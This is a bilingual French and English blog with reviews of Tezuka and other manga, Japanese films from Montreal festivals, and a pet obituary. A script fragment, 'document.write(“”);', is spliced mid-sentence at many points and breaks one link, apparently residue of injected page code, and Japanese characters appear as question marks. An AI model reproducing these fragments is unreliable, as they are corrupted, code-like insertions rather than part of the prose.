Trouble is my business avait pourtant été <a href="http://www.kana.fr/actu-manga/trouble-is-my-business, document.write(“”); 1040″ target=”“new””>annoncé par Kana dès octobre de l’an dernier. Il s’agit encore une fois de la publication d’un oeuvre de jeunesse, parue dans les années ’80. Trouble is my business ( ????? / Jiken-ya kagy? / lit. “profession des incidents” ), écrit par Natsuo SEKIKAWA (Au temps de Botchan) et illustré par Jir? Taniguchi, est un manga seinen policier inspiré des films noirs américains. Il a été pré-publié en feuilletons dans plusieurs magazines entre 1979 et 1994 (principalement dans l’hebdomadaire Manga Goraku de Nihon Bungeisha et Manga Gang de Futabasha) avant d’être compilé en volumes d’abord en 1981, dans une édition révisée en 1989 et une édition définitive en 1996. La collection “Made In” de Kana (Dargaud) nous l’offre en six volumes dont les trois premiers sont déjà disponibles (le vol. 1 en février, le vol. 2 en mai et le vol. 3 en août 2013). Le volume quatre paraitra en novembre.

La série est décrite ainsi sur le site de Kana: “Jotaro Fukamachi est un détective privé et a la réputation de fin limier. Plutôt pingre, il se montre souvent intéressé. D’un autre côté, il a des principes auxquels il se tient. Le principal étant de « tenir toujours une promesse ». Du coup, il lui arrive de s’investir dans des affaires qui ne lui rapportent rien. À travers les affaires de disparitions, d’enquêtes de proximité, il fait face aux côtés sombres de l’être humain. Pourtant, il ne perd pas son humour et sa confiance en l’humanité.”

Les enquêtes du limier ( ???? / Ry?ken tantei / lit. “détective de chien de chasse”) est quant à lui un manga récent, originalement publié en 2011-2012. Basé sur le roman de Itsura Inami St Mary no ribbon ( ??????????? / Sento Mer? no ribon / lit. “Ruban de Sainte-Marie”), ce manga est publié en deux volumes dans la collection Sakka de Casterman: Chien d’aveugle (paru en mars) et Pur-sang en cavale (paru en juin).

Le premier volume est décrit comme suit sur le site de Casterman: “Dans une région montagneuse de la province japonaise, Taku Ryûmon vit en reclus dans son immense domaine en compagnie de son fidèle compagnon, le chien Joe. Passionné de chasse, il gagne sa vie en tant que détective privé spécialisé dans la recherche de chiens de chasse perdus ou volés. Toutefois, sa rencontre avec des membres de la mafia l’amènera à traiter un nouveau type d’affaire. Engagé pour retrouver le chien guide d’une jeune fille aveugle, il découvrira l’entrainement et la relation unique qui lie ces chiens et leurs maitres. A l’issue de cette enquête, il aidera une famille démunie à obtenir un précieux chien guide d’aveugle, le beau labrador noir Mary.”

The last couple of weeks in review (2013-08-31)

The last three weeks have been quite busy. First, document.write(“”); I applied to two new jobs without success. Then my twelve year-old cat took suddenly ill and stopped eating. After a week he was only the shadow of himself and finally left us. He was my best cat ever. It made me very sad.

Then the
Montreal World Film Festival started. I had previously put myself in the mood by writing about two movies screened last year that I hadn’t commented on yet (The floating castle, The little girl in me and the short B&W Foxes and the Cave of Light). So far I’ve managed to see almost all the japanese movies (I still have one tomorrow), but could put only three of them online (Botchan, The Flower of Shanidar, and The devil’s path, plus the Australian short Tau Seru — I’ll do my best to finish the others and post them as soon as possible). The first movies I’ve screened didn’t impress me at all, but they got better and better each day. Up to now my favourite is Mourning Recipe. I’ve strayed a little from my japanese targets and screened an italian movie for a change: L’amore è Imperfetto (I might comment on it eventually if I have time). Don’t worry, I’ll also soon resume commenting on manga… (I am currently reading several of them)

I managed to keep an eye on the news. Lately, it’s all about the chemical attack in Syria and how the world should (or shouldn’t) respond. There was still a few interesting stories that were worth bookmarking and I’ll share them with you after the jump:

It’s “a simple story, with practically no dialogue, that of a young nomad hoping to leave this place. Capturing endless, vertiginous landscapes Tau Seru is a physical, earthy film offering a tender portrait of a father and son in the silence of the lambs.” (Baptiste Etchegaray, on Semaine de la Critique du Festival de Cannes website)

This cute short is not Japanese, but since it was opening for one of the Japanese movies at the World Film Festival, I thought that I might as well talk about it a little.

The director is Australian and it was shot in the Indian Himalayas in a region called Ladakh, near the city of Leh.

A father and son bring their herd of sheep and goats to the “alpine” pastures of the Himalayas. One sheep is sick or too tired and refuse to go further. The father ask the son to go sell it to a nearby camp. The son take the money of the sale, hops on a bus and leaves, presumably for the city. An age-old story beautifully told, with almost no dialogues (in fact, I don’t remember any!). The scenery and the photography is just gorgeous. A nice little gem.

“Journalist Shuichi Fujii receives a letter from convicted killer Junji Sudo. Writing from death row, document.write(“”); Sudo wants to confess to crimes unknown to the police. Visiting Sudo in prison, Fujii learns about “Doc” who masterminded a string of murders. Set up by Doc, Sudo seeks revenge and implores Fujii to find the evidence needed to arrest his former boss. Working from Sudo’s sketchy memories, Fujii begins to piece together a grizzly tale of extortion, torture, rape, and arson. But as his desire to see Doc brought to justice nears a climax, he runs into resistance from unexpected sources.” (Festival’s Program)


This investigative journalism movie is based on a true story that was first published in Shinchosha‘s Shinch? 45 [lit. “mass market 45”] monthly magazine. That magazine started in 1982 as a health and living magazine for the 45+ years-old, but evolved first into a biographical magazine in 1985 and then, in 2001, into a crime stories, scandals & gossips magazine aimed at a female readership in their 30s and 40s, to finally become a general interest magazine in 2008. The whole story was republished as a nonfiction novel titled ??????????????[Kyoaku: Aru Shikeishuu no Kokuhatsu / lit. “Heinous: Accusation of a condemned”], written by the editorial staff of the magazine (Tokyo, Shinchosha, october 2009. 386 pages, ? 580, ISBN 978-4101239187). Of course, the movie is a fictionalized adaptation, so some names and events might have been changed.

Fujii is a reporter at the Shinch? 45 magazine. He is asked by his editor to investigate a letter received by the magazine from a death-row inmate. He goes to prison and interview the inmate, a gangster named Sudo who wants to confess of three murders that the police don’t even know about. Having converted to christianism in prison, he wants to atone for his crimes and give his victims peace by telling the truth about those unknown murders. He also wants revenge against his former boss, who’s the mastermind behind the murders. He feels its unfair that he is on death-row and his boss has not even been accused of anything. Since his boss has abandoned him and tricked him into killing his trusted right-hand man, he also feels betrayed. The boss is simply known as “Doc” [Sensei] or, as he commits murder to profit from land speculation and insurance fraud, the “death alchemist” (because he transform people’s death into gold). However, Fujii’s editor don’t think that such ordinary crimes would interest their readership and orders him to move to another investigation.

Even if he is skeptical that a death-row inmate would tell the truth, Fujii doesn’t want to let go of his investigation just yet. He visits the crime scenes, interviews all possible suspects and witnesses and soon realizes that Sudo’s confession is genuine! He even finds out Doc’s identity: he is named Kimura [actually Sudo and Kimura real names are Goto Ryoji and Mikami Shizuo]. It is a difficult investigation, because Kimura covered his tracks well and there’s little evidences. He succeeds to convince his editor to publish the story. Eventually the police starts investigating, makes accusations and put Kimura to trial.

The movie offers us three different stories: Fujii’s investigation, the unfolding of events as told by Sudo, but also the personnal toll that the investigation takes on Fujii and his family. He is so obsessed with the investigation that he neglect his wife and she eventually asks for divorce. However, what’s the message that director Kazuya Shiraishi want to tell us? Does he simply want to us to be aware of this rather trivial true crime story? Does he want to emphasize the human drama behind such ordinary news item? It’s not clear. To tell the truth this movie is a rather typical and quite ordinary journalistic crime investigation movie. The acting is good, the story itself is intriguing and interesting, but the storytelling and even the photography are quite dull. So, once again, a rather average movie for this year’s festival (and again Japanese movies don’t seems to attrack much attention since this 350-seat theatre had only a 15% occupancy for this showing).

“The “shanidar flower” only grows on certain women. Mysterious buds germinate on their skin and then bloom into beautiful flowers whose extracts lead to a new miracle drug at the “Shanidar Laboratory”. Kyoko and Ohtaki work at the lab, document.write(“”); and are always on the lookout for new donors, but not all women are cooperative. That’s when Kyoko’s charm comes into play. Meanwhile, abnormal side effects begin to appear stemming from the flower-removal surgery. Harvesting these flowers may be triggering something dangerous.” (Festival’s Program)


The movie opens on a commentary that explains how flowers are responsible for the extinction of dinosaurs because plants developed them as a defence mechanism (I am not sure this make sense). Kyoko joins the scientific team of Shanidar Laboratory under the supervision of Dr. Yoshizaki and his assistant Dr. Otaki. Her role is to help recruit study subjects and care for them (mostly psychologically).

It is not explained why the flower grows on women or why some women and not others. Are the flowers implanted? If not why bothering searching for candidates? It’s not made clear. Maybe flowers are usually removed upon discovery unless the candidate accepts to bring it to term for an handsome rewards. The story follows three candidates: Yurie, Miku and Haruka. The movie spends lots of time showing us how the flowers are taken care of and developing the candidates character. The flowers always grow on the chest (near the heart?) and are wrapped in a protective cushion and a hard container with screwing top so its growth can be regularly monitored. Candidates live in a sanatorium-type environment with simple but futuristic Ikea-like living quarters.

Unfortunately, flowers seem to have adverse effects on the candidates. First, it seems to affect their mind and then develop a growing bond with them as they mature. It looks like most women die of cardiac arrest after the flower is removed, but if it’s not removed when the flower bloom, it is said that it releases a toxin that kills the host. Eventually, the three candidates we follow become unstable: Yurie’s flower withers a little when Dr. Otaki rejects her advances, Miku freaks out and starts ripping out other candidate’s flowers, and Haruka rips out her own flower to give it to Miku. This incident leads to the eventual shut down of the project.

The movie could have ended there, but then Kyoko is having an affair with Dr. Otaki. She reveals to him that a flower is budding on her too. Fearing for her safety he cuts it in her sleep, but she wanted it to bloom and seeds, so she leaves him. Otaki goes back to his botanical research. Later he learns that Kyoko’s flower grew back and gave seeds, causing her to fall into a coma. He finds shanidar flowers growing all over the city now. It is then revealed that they are a parasitic species possibly responsible for the extinction of dinosaurs and Neanderthal. They will probably destroy all human civilization and bring us to evolve into plants!

That’s quite a weird science-fiction movie. Is there an allegory or a metaphor hiding in there? Some new-age cautionary tale about genetically modified plants and evil pharmaceutical companies? I am really not sure of what director Gakuryu Ishii wanted to tell us. The poetic story is interesting, but lacks focus and develops way too slowly (really, I almost fell asleep many times). The acting is barely average, but the sets are nice (despite the low budget) and the photography (with a lovely imagery that sometimes border the psychedelic) as well as the music (cool electric guitar) are also quite nice. Even if the deficient writing is compensated by nice visuals, it remains a rather average movie. (It didn’t attract much interest since the 150-seat theatre was only 20% filled)

One interesting point is that the movie (and the name of the flower) is inspired by a real fact mentioned in the movie: an archaeological excavation campaign undertaken in the Shanidar Cave (Northern Irak) between 1957 and 1961 led to the discovery of ten skeletons of Neanderthals. The find of pollen in one of them, indicating that flowers had been buried with the body, was considered evidence of burial ritual. However, recent studies seems to suggest that the pollen was a later contaminant (possibly brought by animals).

It is with great sadness that we announce the passing of our beloved Spotty on Saturday, document.write(“”); August 24. He is survived by his “parents” Clodjee and Miyako, his lovely “brother” Saya, his “grand-parents” Claude-Eugène and Laure, his “aunts” Luce and Francine, as well as his “cousins” Vanille, Cendrine and Pépi.

Spotty came out of the back alley and chose us to take care of him. He was a gentle and overwhelmingly loving cat. He left us after a short sickness. We are immensely grateful for the time he has spent with us.

We want to express our deep gratitude to Dr. Odette Girard and the Clinique vétérinaire de la Promenade.

“Tomoyuki Kaji, document.write(“”); 28, is socially inept and thoroughly lacking in self-confidence. “If you die, are you happy then?” he asks on the Internet. An employment agency sends him to work at a factory in Nagano where he meets Tanaka, a co-worker who suffers from narcolepsy. “To the stars, we’re all alike,” he muses, and the pair become fast friends. This is new territory for Kaji, and he is exhilarated. Out for a drive one night, they meet Yuri, a young girl who has fled the clutches of their co-worker, Okada. Charmed by Yuri, they attempt to protect her. But this isn’t as simple as they imagine…” (Festival’s Program)


Tomoyuki Kaji is a loner, socially inept and quite a shy guy. He moved from Tokyo to Nagano to work in a car-parts’ factory. He receives his orientation at the same time than another new arrival, Okada, who’s a bold, arrogant young man. Both go to eat together afterward and at the restaurant they meet Tanaka, another factory worker who’s also quite socially inept and suffers from narcolepsy when he’s emotional. Okada leaves them to go out with a woman (he’s got what Kaji calls “mojo”, i.e. success with women), so Kaji and Tanaka, realizing they are quite similar, become friends. They are both bullied by their co-workers, including Okada, who turns out to be a serial rapist and murderer. When he meets the sister of the speed ice-skater he first killed because he was jealous of his performance, he turns his attention to her, but she escapes and is helped by Kaji and Tanaka who are having an outing in the countryside. However, when Yuri show her preference for Tanaka, Kaji feels betrayed and abandoned. After all, maybe he has more affinity with Okada? Feeling despair, he goes to Akihabara with the intent of running people over with his car and stabbing many with a huge knife…

Why is the movie titled “Botchan” when it has apparently nothing to do with S?seki’s novel of the same name? The only similarity I can see is that S?seki recount with humour his experience of being a teacher transferred from Tokyo to Matsuyama (on Shikoku island), while the movie tells us about the tribulation of Kaji moving to work in Nagano. The central issue of the novel is about morality, while the movie’s theme is more about loneliness and despair (and if it’s a comedy, it’s a twisted and sick one!).

I feel that there has been a lot of Japanese movies lately about socially inept people, like the so-called hikikomori (withdrawn) and dokuo (socially inept young men). Is it because it’s a problem that is particularly on the mind of the Japanese in the recent years? Or is it the expression of the accumulation of collective despair due to the Great Eastern Earthquake and tsunami, years of economic hardship, failure of the japanese dream, and a national psychological profile made of a facade (the need for social conformity creates lots of emotional repression) that is starting to crack at the seams? There’s lots of bottled-up emotions in those Japanese! And the tendency to ostracize those who start to buckle under the pressure (avoiding social contacts or sticking out as different and weird) only makes this problem worse, as it alienates them even more. Sometimes pushing them over the edge…

It is very difficult to understand this movie if you don’t have basic notions of Japanese society, culture and history. In the end, the movie makes a vague reference to what is known as the “Akihabara massacre” (see reports about this in BBC News, Japan Probe, The Washington Post and The Yomiuri Shimbun). The movie doesn’t explain anything and assume the viewers already know about it (clearly indicating that it was not intended for a foreign audience). On June 8, 2008, Tomohiro Kat? (25 year-old) drove his two-ton rented truck into the Akihabara crowd, killing three people, then got out of the truck and started stabbing people with a dagger, killing four more and injuring at least ten.

Clearly, the movie is trying to answer the question: “what could have pushed a man to commit such a terrible thing?” There are indeed many similarities between Kaji (in the movie) and Kat?, who was an unpopular loner and looser from Aomori, working temporarily in an auto parts factory in Susono City (Shizuoka-ken), often posting messages with his phone on a web site, and who got upset when some co-workers had hidden his work clothes. He reportedly told the police that he was “tired of life”. Of course, the movie is set in a different place and Kaji drove a mini-van, not a two-ton truck. Not much is known on the motivation of the real killer. Although the movie is offering interesting speculations, I seriously doubt that it really happened that way.

So, I understand that the movie is trying to explain the Akihabara massacre, putting the blame of the murderer’s social inaptitude on the pressure of society, but many aspects of the movie still doesn’t make sense! Like: why, while everybody is being chased by Okada, no one think of calling the police? Maybe the director wanted to parallel the fact that, despite Kat? posting his intentions on the internet, nobody tried to stop him. Was anyone listening?

I feel that this movie is more a reenactment documentary than entertainment. It is weird and pointless. With all the angst and screaming, it is quite painful to watch. It attracted little attention (40 viewers in a theatre of about 150 seats, that’s an occupancy of 26%) and a couple of people left before the end. It’s an interesting subject of reflection, for TV maybe, but not an entertaining movie to watch in a theatre.

Buddha (???) is a sh?nen manga written and illustrated by Osamu Tezuka. It was successively serialized in Ushio Shuppansha’s magazines Kibo-no-tomo, Shonen World and Comic Tom between September 1972 and December 1983, before being compiled in fourteen volumes. It has been translated in french by Tonkam and in english by Vertical.

Osamu Tezuka did not limit his manga writing to stories for children, like Astro Boy (Tetsuwan Atom) or Kimba the White Lion (Jungle Taitei). He also wrote very serious stuff, like his manga adaptation of Dostoyevski’s Crime and Punishment, Faust, Tell Adolf (Adolf ni Tsugu), Phoenix (a spiritual allegory told through the entire human history), and Buddha, a fictionalized biography of Siddhartha Gautama.

Buddha is Tezuka’s longest continuous story, spanning eight volumes for a total of three thousand pages! With this story, he wanted to tell the human side of the life of Buddha. It is not a reference book on Buddhism (although the book is endorsed by several Buddhist groups), but it is a very good introduction to Buddhist ideas—at the same time Tezuka expresses his own moral views of the world, deeply rooted in humanism and the respect of life, which happen to be similar to Buddhist philosophy. Volume one of Buddha tells the story of Chapra, a young man who tries in vain to elevate himself from his status of shudra (slave caste). In his endeavor he meets with the monk Naradatta and with the pariah Tatta. In this volume, we also see the birth of Siddhartha (but not until page 267!!).

Tezuka’s style is very old-fashioned and naïve, yet very cinematic at the same time. It is not surprising to learn that his strongest influences, as he admitted himself, were old Disney and Fleischer animations. However, despite his cartoonish art, he succeeds in telling a very serious story, while keeping it simple and accessible—even to children (however, parental discretion is advised since there’s some nudity and violence). Tezuka is an excellent storyteller, keeping the reader constantly captivated throughout this spiritual and historic fresco. He successfully balances the depth and drama of the story with a good dose of humor and poetry. It is a fascinating work that deserves to be considered his masterpiece. I am glad that Vertical chose to publish this title, first in hardcover, and later in paperback. My only regret is that they decided to publish it in the western left-to-right format and not in its original Japanese right-to-left version.

The manga was adapted into two anime film: Tezuka Osamu no Buddha: Akai Sabaku yo! Utsukushiku (Buddha: The Great Departure, released in may 2011) and Buddha 2: Tezuka Osamu no Buddha ~Owarinaki Tabi~ (it should premiere in Japanese theaters February 2014; a 10-Minute English-subbed trailer was recently posted).

“In a world of black and white, document.write(“”); ore dug from the cave is shedding colored light. Mikuro, identifying himself as the “Black Fox” bandit appears in front of the white-haired boy Kohaku who is captured in the back of a cave by a gang of thieves. Mikuro who collects the ore shedding “colored” light, says proudly that he has a “dream” to fulfill in this world of black and white. “It’s decided! From now on you will be my little brother.” Kohaku has lost hope for life after his parents were murdered, but he is forced to be Mikuro’s little brother and together they start running towards the world out of the cave.” (from the movie Press Book)


A young boy with white hair is from a race that can make rocks glow in a very colourful manner. This ability is feared in a world where all colour has disappeared, leaving only black and white, and therefore members of this race are persecuted. White Fox is captured and held in a cave, but he is saved by Black Fox who as vowed to restore colour to the world. He sees White Fox as the only one left who could do it. They escape to the surface and join Black Fox’s sister who is almost blind, but can see only colour. She is the reason why Black Fox wants to bring back colour and makes his sister see again.

This is a nice short movie that feels a lot like a student movie. However, it was planned as a pilot for a full-lenght feature film. Because of his young age, Kiyoshi Endo had trouble to find support for his fantasy adventure feature film, “B/W Foxes and the Rainbow Crystal”. And then the Great East Japan Earthquake occurred, paralyzing most of the movie industry in Japan. After doing some volunteering in the area affected by the tsunami, he decide to at least produced this short prelude. It was shot in five days, under conditions of heavy snow fall, in the northeast: Abukuma-Dou in Yamamoto-cho (Miyagi prefecture) and Tamura City in Tohoku district (Fukushima Prefecture).

Action and stunt scenes could have been better, but considering this is a very low budget movie, it is quite acceptable. The actor playing White Fox had lots of hesitation in his acting, but that also is to be expected considering his young age (even if he had previous acting experience). The special effects are not too bad, so all in all it is a nice and cute story. (And it is surprising I could say that much about such a short movie).

“When Kensuke Adachi is fired from his job for a mistaken order, document.write(“”); he is devastated. He withdraws from society and locks himself in his room. His father Kenzo and his sister Yuko are worried but can do nothing besides supporting him. One day Kensuke finds a web site for people who love dressing up in female clothing. Kensuke is fascinated by the drag queen depictions on the site posted by users who proudly display their glamorous alter egos. At first Kensuke thinks the images are demeaning, but gradually he begins to become very interested in the lifestyle depicted on screen.” (from The Montreal World Film Festival program guide)


Kensuke finds a job right after graduating university. He is a shy and clumsy boy, pessimistic and quite unsure of himself, so eventually his mistakes get him fired from his job. He is hurt and becomes withdrawn, refusing to leave his home for five years. This is a phenomenon that the Japanese call “hikikomori”, often seen in bullied children who cannot deal with social interaction by fear of being hurt physically or emotionally. Eventually his disorder evolves into becoming a jyosoko otaku, someone who is obsessed with cross-dressing. This activity will bring him to interact socially again and help him finally find acceptance. He will find himself as well as a comfortable place in society. He will not be afraid of commitment anymore.

Kensuke is not homosexual. He simply likes to wear women’s clothing. However, since a gay guy falls for him, the movie also obliquely address the subject of LGBT in Japanese society. If they have rarely encountered as much hate and discrimination as in western culture, Japanese LGBT have more often been subject of ridicule and have now started gaining acceptance. Kensuke situation is therefore similar to the plight of most Japanese LGBT. All in all, this movie is a simple coming of age story.

I must admit that I didn’t expect too much from this movie. The previous movies that I’ve seen from director Shoji Kubota (Lost Love Murder seen at the Montreal Film Festival in 2010 and Crazy-ism seen of the festival in 2011) didn’t impressed me at all. I found them rather boring and amateurish. However I was quite surprised to find that The little girl in me is quite enjoyable. It is still a very low budget movie, but this time the acting is excellent (although there was a few scenes at the beginning of the movie where the acting felt awkward, but it was probably to express the discomfort of the characters) and the photography is quite good. I guess the director has grown more experienced and more confident.

Dororo (???) est un manga sh?nen écrit et illustré par Osamu Tezuka. Il a d’abord été prépublié en feuilleton dans le Weekly Shonen Sunday de Shogakukan (entre le 27/08/1967 et le 22/07/1968) avant d’être compilé en quatre Tankoubon (volumes). Il a été traduit en français par Delcourt et est maintenant également disponible en anglais chez Vertical.

Ce manga a connu de nombreuses adaptations. Il a d’abord été adapté en une série télé d’animation de 26 épisodes, intitulé Dororo et Hyakkimaru (???????). Produit par Mushi (le studio de Tezuka) sous la direction de Gisaburo Sugii, il a été diffusé sur Fuji TV (le dimanche à 19h30 entre le 06/04/1969 et le 28/09/1969). En Septembre 2004, Sega a aussi produit un jeu vidéo pour PS2 intitulé “Blood Will Tell”. Finalement, le manga a été adapté au cinéma par Toho en 2007 avec Akihiko Shiota à la réalisation, ainsi que Kou Shibasaki (Dororo) et Satoshi Tsumabuki (Hyakkimaru) dans les rôles principaux. C’est une étrange adaptation (l’histoire se déroule dans le futur) qui se voulait la première partie d’une trilogie (la suite n’a jamais été produite) mais qui respecte bien l’esprit du manga (pour plus de détails voir, en anglais, les sites de Anime News Network, AsianWiki et IMdB).

Le père de Hyakkimaru, Daigo Kagemitsu, était un seigneur de guerre de l’époque Sengoku. Un jour, il se rendit à un temple connu comme le “pavillon des enfers” et demanda à y passer la nuit, seul. Afin de devenir le maître du pays tout entier, il promit à chacun des quarante-huit démons du temple (représentés par des statues) une partie de son fils. Ainsi, son fils naquît muet, sourd, aveugle, sans aucun membres. Il lui manquait quarante-huit parties du corps (incluant nez, nombril, cheveux, etc.). Éplorée, la mère due, malgré elle, abandonner à la rivière cet enfant considéré non viable. Il fut toutefois recueilli par une sorte de médecin de campagne un peu sorcier qui en prit soin et, contre toute attente, il survécu. Le médecin lui fabriqua des prothèses qui lui donnèrent une apparence plus humaine et il développa des habilités surnaturelles (télépathie, fort instinct et “sixième sens”) qui lui permirent de se déplacer et de communiquer comme un être humain normal.

Cependant, sa nature surhumaine attirait démons, spectres et fantômes ce qui s’avérait dangereux pour son père adoptif. Il décida donc de quitter sa maison à la recherche d’un lieu mieux adapté à sa nature. Avant son départ, le médecin le dota d’un sabre, caché dans l’un de ses bras artificiels, et le baptisa Hyakkimaru, l’enfant-aux-cent-démons. Une nuit, un esprit lui avoua que s’il pourchassait et tuait les quarante-huit démons qui lui avaient volé son corps il pourrait peut-être un jour redevenir normal. Plus tard il sauva une jeune voleur (peut-être avait-il senti que, comme lui, l’enfant était plus que ce qu’il prétendait) qui devint son compagnon de route et ainsi tous deux sillonnent les campagnes à la recherche de démons.

Dororo a été créé à l’origine pour bénéficier de l’immense popularité des histoires de fantômes et de monstres (dans la tradition de l’oeuvre de Shigeru Mizuki), mais a fini par devenir plus une quête héroïque. Hyakkimaru et Dororo (dont le nom vient du mot japonais pour voleur, “dorobo”) sont tous deux à la recherche de ce qu’ils ont perdu: les parties du corps dispersés de Hyakkimaru et le trésor du père de Dororo. Toutefois, ce manga est bien plus qu’une histoire de samouraï et de voleur sur une mission de pogrom démoniaque. Il s’agit plutôt d’une quête de découverte de soi, sur un fond de lutte de classe (un thème certainement inspiré par l’idéologie de l’époque, notamment le “Zenky?t?”, ou le mouvement de protestation étudiants, entre les années 1965 et 1972, particulièrement dans les universités de Nichidai et Todai à Tokyo). Comme la plupart des manga de Tezuka, celui-ci est très bien écrit. Le récit est captivant et, en dépit de l’aspect cartoonesque des protagonistes, très sérieux–mais jamais dénué d’humour.

Sans être une oeuvre majeure de Tezuka, cette brève série de manga mérite tout de même notre attention. Cela vaut certainement la peine d’être lu.

Kirihito (?????? / Kirihito Sanka / lit. “éloge de Kirihito”) est un manga seinen relativement obscure écrit et illustré par Osamu Tezuka. Il a été prépublié en feuilleton dans le magazine Big Comics de Shogakukan entre Avril 1970 et Décembre 1971. Il a été compilé en un nombre de volumes qui varie beaucoup selon l’éditeur (de deux à cinq volumes) mais l’édition complète de l’oeuvre de Tezuka par Kodansha en 1977 le met en quatre volumes.

C’est un manga très complexe qui représente un point tournant important dans l’oeuvre de Tezuka. Il s’agit de sa première histoire de suspense médical (lui-même médecin, Tezuka va perfectionner ce genre pour sa série Black Jack (1973-83) et utilisera également une thématique médicale pour L’arbre au soleil (1981-86), une chronique biographique qui retrace la vie de son arrière-grand-père, Ryoan Tezuka, aussi un médecin). C’est également sa première oeuvre influencée par le gekiga et offrant une forte thématique sociologique. Même son style graphique, qui apparait moins cartoonesque et caricatural qu’à l’habitude, subit l’influence du gekiga, un genre de récit graphique plus sombre, plus dramatique et réaliste, par opposition au manga qui est un genre généralemenet considéré plus léger et comique.

Le jeune docteur Kirihito Osanai étudie une maladie énigmatique qui transforme les humains en créatures d’une apparence quasi canine. Recherchant les causes de cette maladie, qu’il croit d’origine environnementale, il se rend dans un village reculé du Japon où il en devient lui-même victime. Il réussi à en contrôler le développement mais doit aussi faire face à une conspiration orchestrée par son propre patron. Il est fait prisonnier par un cirque chinois, mais réussi à s’échapper. Cependant l’avion qui l’amène de Taiwan aux Pays-Bas est détourné et il se retrouve bloqué au Moyen-Orient.

Préfigurant étrangement son Bouddha (1972-83), Tezuka explore les valeurs morales fondamentales du christianisme en utilisant un personnage qui a une vie de souffrance comme l’a fait Jésus-Christ (et le nom du personnage est un jeu de mot sur le nom du “Christ”, qui se prononce “Kirisuto” en japonais, et peut-être aussi sur “hosanna” qui est une exclamation de louange à Dieu en araméen et en hébreux). Le message humaniste de Tezuka (fait de compassion et de non-violence) commence à prendre forme. Au premier niveau, l’histoire offre un commentaire social sur l’ostracisme et le racisme, l’enseignement de l’acceptation de toutes les différences et le fait que, peu importe la façon dont nous nous regardons, nous sommes tous humains. Pour cela, Tezuka pourrait avoir utilisé une maladie comme la lèpre, mais cela n’aurait pas eu un effet aussi spectaculaire qu’une maladie fictive comme celle de Monmô, ce qui lui permet aussi d’ajouter, à un second niveau, un commentaire moral sur la nature humaine. Il dénonce ainsi les vices humains, démontrant que nous devons constamment nous battre pour rester au-dessus de la bête. Sur le rebond, il critique également la médecine moderne, qui est souvent plus préoccupés par la politique, les récompenses, les subventions et la promotion personnelle des ses chercheurs que de la santé réelle des patients.

Ce manga nous propose une histoire plutôt sérieuse qui se déroule lentement, ce qui ne plaira sans doute pas aux fans de Tezuka habitués à des récits plus légers. C’est toutefois superbement écrit et assez captivant. L’édition française de Delcourt/Akata honore bien cet excellent ouvrage avec une présentation attrayante et respectueuse: bonne traduction, sens de lecture original, répartie sur quatre volumes — contrairement à l’édition anglaise de Vertical qui renverse les planches pour les présenter dans le sens de lecture occidental, en un seul volume énorme et encombrant.

Je n’ai lu que le premier volume mais l’ensemble de la série m’apparait d’un grand intérêt et je m’efforcerai sûrement d’en lire la suite dès que possible. Même si ce n’est pas une oeuvre très connue de Tezuka, j’en recommande la lecture car je crois que c’est un manga important pour comprendre et apprécier la travail du maître.

To follow up on
my presentation of the Fantasia 2013 programmation, document.write(“”); I am adding here a few comments on this 17th edition of the Fantasia International Film Festival that just concluded.

This year the Japanese selection of the festival was offering thirty-three movies (including eight anime and three shorts). Unfortunately, I don’t have time anymore to queue to watch every Japanese movies like I used to do, and I also feel that I don’t fit with that kind of young, over energetic crowd anymore. But at least I was able to watch one movie and review two: Thermae Romae and Library Wars. There are a few more movies that I wished I would have been able to screen, like the Rurouni Kenshin live-action or Garden of Words, the latest Makoto Shinkai’s anime.


If you want to know more about the Japanese movies offered at this year’s Fantasia, I can recommend you the very interesting review by Claude R. Blouin at Shomingekiblog about seven of those movies (in french). Mr. Blouin says:

I draw the attention of literature’ lovers on a film whose spirit should reach readers of Gabrielle Roy, The Garden of Words, as well as on The Great Passage, which is about the life of words. About the world of image, Helter Skelter is noteworthy. Also Key of life for the relationship between play and adaptation. The introduction should give everyone some leads to go to the movies more likely to answer their concerns.

In a press release, the festival announced that it has reached “record attendance numbers this year, boasting more than 125,000 festival-goers for its 17th edition, surpassing last year’s record of 109,000 (a 15% increase). Over the course of its three-week film marathon, it presented over 131 features from 31 countries and more than 220 shorts from across the globe.” They also proudly announced this year’s prize-winners. Here we will list only those from Asia:

I’d like to share one last thought about a complain that I heard again and again over the years: the line-ups. I guess that the festival is a victim of its own success. It is a problem that has always plagued the festival and that keeps people from attending. I heard many time (even this year) people saying that they would not come to Fantasia because they didn’t like the long line-ups (I, myself, abhors waiting in line and it’s one of the reasons that kept me from attending lately — besides being quite busy and not being a fan of the loud, rowdy crowd that seems to favours Fantasia). You line-up to get the tickets and then line-up again to get into the theatre. In a way, it’s a boon for the festival since most shows are sold out and not much can be done anyway to improve the experience for the viewers…

When I went to see Library Wars I must admit that I didn’t wait for the tickets, but, since I arrived only an half-hour early, I ended up waiting in line way over the corner of Ste-Catherine street, a little past the Centre Hi-Fi! Of course, the VIPs (guests, press or “friend” of the festival) have their own, much shorter line-up, but, surprisingly, it seems that even the $250 “Fantasia Passport”, giving access to every films, does not give priority access to screenings. I surely miss the time when it was worth for me to get a press accreditation. Now I am too busy and won’t bother with the accreditation process just for one or two movies. It’s too bad because the Fantasia selection of movies always includes some very interesting titles that can’t be ignored.
